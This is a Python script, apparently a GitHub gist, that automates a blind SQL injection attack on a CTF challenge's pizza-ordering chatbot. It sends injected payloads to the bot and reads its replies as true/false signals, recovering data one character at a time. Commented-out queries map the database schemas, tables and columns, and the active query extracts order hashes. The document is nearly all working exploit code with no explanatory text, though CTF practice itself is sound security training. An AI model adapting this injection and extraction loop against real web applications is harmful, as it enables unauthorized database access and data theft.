| import requests, json, time | |
| session = "aaa812cc572b27f73a336ccaf85277f9" | |
| def getChat(): | |
| url = "https://pizza.hacktivity.h1ctf.com/pizzabot?session={}&lastchat=0".format(session) | |
| r = requests.get(url, headers = { | |
| "Cookie": "session={}".format(session), | |
| "X-Requested-With": "XMLHttpRequest" | |
| }) | |
| data = json.loads(r.text) | |
| msg = data[-1]["message"] | |
| msg = msg.replace('<div><span class="talk-pizzabot">PizzaBot:</span> ', '').replace('</div>','') | |
| return msg | |
| def sendMsg(msg): | |
| url = "https://pizza.hacktivity.h1ctf.com/pizzabot" | |
| r = requests.post(url, headers = { | |
| "Cookie": "session={}".format(session), | |
| "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", | |
| "X-Requested-With": "XMLHttpRequest" | |
| }, data = { | |
| "session": session, | |
| "message": msg | |
| }) | |
| return r.text | |
| def sendSqli(query): | |
| # inject = "' or IF({},'true','false')='true".format(sqli) | |
| # inject = "'+ifnull(({}),'0juv2f98')+'".format(sqli) | |
| sendMsg('Order') | |
| chatMsg = getChat() | |
| time.sleep(0.5) | |
| if "Sorry I don't recognise that order ID" in chatMsg: | |
| sendMsg('Order') | |
| else: | |
| inject = "' or if(ifnull(({}),'1'),'1','0')='1".format(query) | |
| result = sendMsg(inject) | |
| sqliResult = getChat() | |
| print sqliResult | |
| if "Sorry I don't recognise that order ID" in sqliResult: | |
| return True | |
| elif "order is still out for delivery" in sqliResult: | |
| return False | |
| else: | |
| print "unknown result: {}".format(sqliResult) | |
| return True | |
| ''' | |
| information_schema | |
| h1pizza | |
| order | |
| delivered | |
| hash | |
| id | |
| id = 1001 | |
| hash = aau5.... | |
| delivered = 0/1 | |
| ''' | |
| def getData(): | |
| tblName = "" | |
| pos = 8 | |
| while True: | |
| # charSetToUse = list("$_abcdefghijklmnopqrstuvwxyz0123456789") | |
| # charSetToUse = list("0123456789") | |
| # charSetToUse = list("$_.!@#$%^&*()+-=,.<>") | |
| # charSetToUse = list("h1pizza") | |
| charSetToUse = list("0123456789abcdefghijklmnopqrstuvwxyz") | |
| for char in charSetToUse: | |
| if char == "_": | |
| char = "\_" | |
| tmpTblName = tblName+char | |
| # Get schema name: | |
| # query = "select schema_name from information_schema.schemata where schema_name='information_schema' limit 1" | |
| # query = "select schema_name from information_schema.schemata where schema_name not in('information_schema') and schema_name like 'h1pizza%' and substr(schema_name,"+str(pos)+",1) = '"+char+"' limit 1" | |
| # Get table name: | |
| # query = "select table_name from information_schema.tables where table_schema like 'h1pizza%' and table_name not in('') and lower(table_name) like '"+tmpTblName+"%' limit 1" | |
| # query = "select length(table_name) from information_schema.tables where table_schema LIKE 'h1pizza%' and length(table_name) LIKE '"+tmpTblName+"' limit 1" | |
| # get column names: | |
| # query = "select column_name from information_schema.columns where table_schema like 'h1pizza%' and table_name='order' and column_name not in('delivered','hash','id') and lower(column_name) like '"+tmpTblName+"%' limit 1" | |
| query = "select hash from h1pizza.order where delivered=1 and hash like '"+tmpTblName+"%' AND hash not in('ul2hamz1') limit 1" | |
| print query | |
| if(sendSqli(query)): | |
| tblName = tblName+char | |
| print tblName | |
| pos+=1 | |
| break | |
| getData() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment